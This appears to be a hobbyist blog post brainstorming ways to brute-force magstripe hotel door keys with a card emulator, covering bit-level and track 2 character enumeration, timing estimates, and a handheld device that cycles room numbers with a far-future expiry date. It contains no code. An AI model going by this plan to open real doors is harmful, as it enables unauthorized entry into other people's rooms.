I was writing up the page for the Magomatic and started on the improvements section. I realized I started going on and on about a possible brute-forcing function and I decided that it would be better suited for a post instead of putting it on the page. So prepare yourself, as I am about to dump everything I can think of regarding brute forcing magstripe card door locks.
I was thinking that since I can just read card data with a computer, I should be able to read a room number off the card, alter that data to another room number, and put that information on my emulator. This would work in theory, but what if the card contains encrypted data? Then you would not know what represents the room number. What’s more, what if the card does not conform to the track 2 standard? They could use their own protocol. Either way, all I will see are 1′s and zeros.
Since the encrypted data is still only 1′s and 0′s, you could potentially try every possible combination of 1′s and 0′s until you found a combo that worked. Analyzing multiple cards of the same type, (door keys for example) you could potentially see how much data changes from room to room or date to date. You could then lower the amount of bits you would have to brute force to just the number of bits that change. This may be impractical seeing that to brute force each bit would mean that the total number of possible combinations is equal to 2^n where n is equal to the number of bits required to brute force. That means for just 10 bits you would have to try 2^10 = 1024 combinations. It would probably take the magstripe reader about 1.5 – 2 seconds to deny a card. If it took 2 seconds, that means brute forcing 10 bits would take (1024 * 2) / 60 = 34.13 minutes. That might not be worth the time.
Another option for brute forcing is to brute force each byte, rather than each bit. This will only work if the magnetic stripe key follows valid track protocol and is not encrypted. In this case, you could just read the data on your computer and alter whatever you wanted, however what if you wanted a hand held device to do everything for you automatically? It is rather cumbersome to hook up a reader to a laptop, scan the card, alter the data, program a microcontroller, put the micro in your emulator, and then open a door. It would be much nicer to have a device that could just brute force open any door.
If one of these cards follows valid track 2 format, then you could just brute force every 5 bits (there are 5 bits in a byte in track 2 format) rather than every single bit. However, now you have more possibilities for each byte. It’s not just either a one or a zero. Each byte can represent 11 different characters (0-9, =). I found this information by consulting this resource. Track 2 also states that there are 37 data bytes between the start and end sentinal values. This means that the total possible combinations you would have to brute force would be 11^37= way too many to be worth the time. In this case, the best thing to do would be to analyze the data on a computer, figure out where the room number and/or expiration date is stored, and then program a microcontroller to try every possible room number while keeping the other data the same. It could then make sure that the date was some date way in the future to ensure it would work. Better than this, you could put an interface on the device to program the exact room number. Using a serial LCD and a few buttons, you could view the data after it is scanned into the device. Then the buttons can be used to alter the data or just punch in the room number.
Brute forcing these things seems mostly impractical due to the fact that it would take forever to brute force all the data on a card but in the event of encryption, it may be necessary. If you can narrow down just a few bits that need brute forcing it would be worth it. I’ll have to experiment once I have some data to analyze.